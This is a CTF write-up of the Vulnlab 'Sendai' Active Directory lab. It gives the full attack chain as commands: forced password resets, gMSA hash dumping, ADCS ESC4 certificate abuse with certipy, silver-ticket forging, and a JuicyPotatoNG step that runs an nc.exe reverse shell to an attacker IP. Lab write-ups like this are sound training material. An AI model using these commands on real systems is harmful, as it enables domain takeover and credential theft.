CTF-Writeups/Vulnlab/Sendai.md

Vulnlab - Sendai

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus           
80/tcp    open  http          Microsoft IIS httpd 10.0  
|_http-server-header: Microsoft-IIS/10.0
88/tcp open  kerberos-sec
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl            
| Issuer: commonName=dc.sendai.vl                                     
|_http-server-header: Microsoft-IIS/10.0                
| http-methods:                                
|_  Supported Methods: GET
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-04T16:24:01
| Not valid after:  2024-11-03T16:24:01
| MD5:   6198fc32527e478294e38fd5c6a2b81e
|_SHA-1: 73b4d1026b49e0cb9c0d633982377e74f32b7db3
|_ssl-date: 2024-05-05T16:28:56+00:00; -1m22s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  unknown
56740/tcp open  unknown
56744/tcp open  unknown

PORT 80/443

Running gobuster, we can find /service

However this endpoints shows that we don't have access to it

PORT 445

Enumerating smb shares with anonymous login, we'll see config, sendai and Users share, where config was not accessible, Users didn't anything but sendai had some interesting files

The incident talked about users having weak passwords, all users will be prompted to change their password on logging in, the transfer directory had user's directories

Resetting domain user's password

These users can also be enumerated through lookupsid by brute forcing sids

On trying to login with null password, we'll get two users with password to be changed Password can be changed with `impacket-smbpasswd`

impacket-smbpasswd  sendai.vl/Thomas.Powell@dc.sendai.vl -newpass '$aduwu123'

From config share, we can grab `.sqlconfig` having credentials to MSSQL

But this service isn't exposed to us so moving on to enumerating the domain with bloodhound

python3 bloodhound.py -u sqlsvc -p password -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.104.41

Thomas.Powell is a member of Support group has GenericAll on ADMSVC group which has ReadGMSAPassword on MGTSVC$ account. We'll need to add thomas in ADMSVC group, read the NThash of MGTSVC account

Abusing GenericAll and reading GMSA password

Through bloodyAD we can add thomas in ADMSVC group having genericall rights

 python3 bloodyAD.py  --host "10.10.104.41" -d 'sendai.vl' -u 'thomas.powell' -p '$aduwu123' add groupMember ADMSVC thomas.powell

With gmsadumper script or with netexec we can dump the nthash of mgtsvc account

python3 gMSADumper.py -u 'thomas.powell' -p '$aduwu123' -d sendai.vl -l 10.10.104.41

This account can login on DC as it's part of Remote Management group

Checking the privileges after logging in through evil-winrm, it doesn't have any privilege that we can abuse to get local admin

Obtaining clifford's password

From the running process, we have helpdesk which doesn't normally run on a system

Enumerating the system with PrivescCheck.ps1

This will list down the running processes from where we'll find the clifford.davey's creds

Enumerating ADCS

This user belongs to CA-Operators group, so he likely will be able to enroll in a custom template, enumerating templates with certipy

Escalating privileges through ESC4

certipy find -u clifford.davey -vulnerable -target dc.sendai.vl -dc-ip 10.10.115.126 -stdout

This lists down a template SendaiComputer which has EKU set to Client Authentication that can be used to authenticate on the system and ca-operators group has Full control over this template which means we can edit this template and impersonate as the domain admin, which is known as ESC4 (access control) abuse

With certipy, we can change the configuration of this template to allow domain users to enroll for this template and impersonate any user

certipy template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.115.126 -template SendaiComputer

certipy req -u 'clifford.davey' -ca 'sendai-DC-CA' -dc-ip 10.10.115.126 -target dc.sendai.vl -template 'SendaiComputer' -upn administrator

certipy auth -pfx ./administrator.pfx -domain sendai.vl

Escalating with SeImpersonate privilege

Another way of escalating privileges is through mssql, since mssql is running internally, having access on the machine we can port forward withchisel

chisel server -p 2222 --reverse
chisel.exe client 10.8.0.136:2222 R:socks

But we'll get login denied for sqlsvc account

With ticketer, forging a silver ticket for accessing MSSQL service as an administrator

ticketer.py -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -nthash hash Administrator

Enabling xp_cmdshell which will allow us to execute system commands as sqlsvc

The difference here is that we'll have SeImpersonate privilege, which can abuse to get local admin

Using juicypotato-ng to abuse the privilege and get a shell a SYSTEM

.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Users\sqlsvc\nc.exe 10.8.0.136 4444 -e cmd.exe"

References

• https://exploit-notes.hdks.org/exploit/windows/active-directory/smb-pentesting/
• https://github.com/itm4n/PrivescCheck
• https://hideandsec.sh/books/cheatsheets-82c/page/active-directory-certificate-services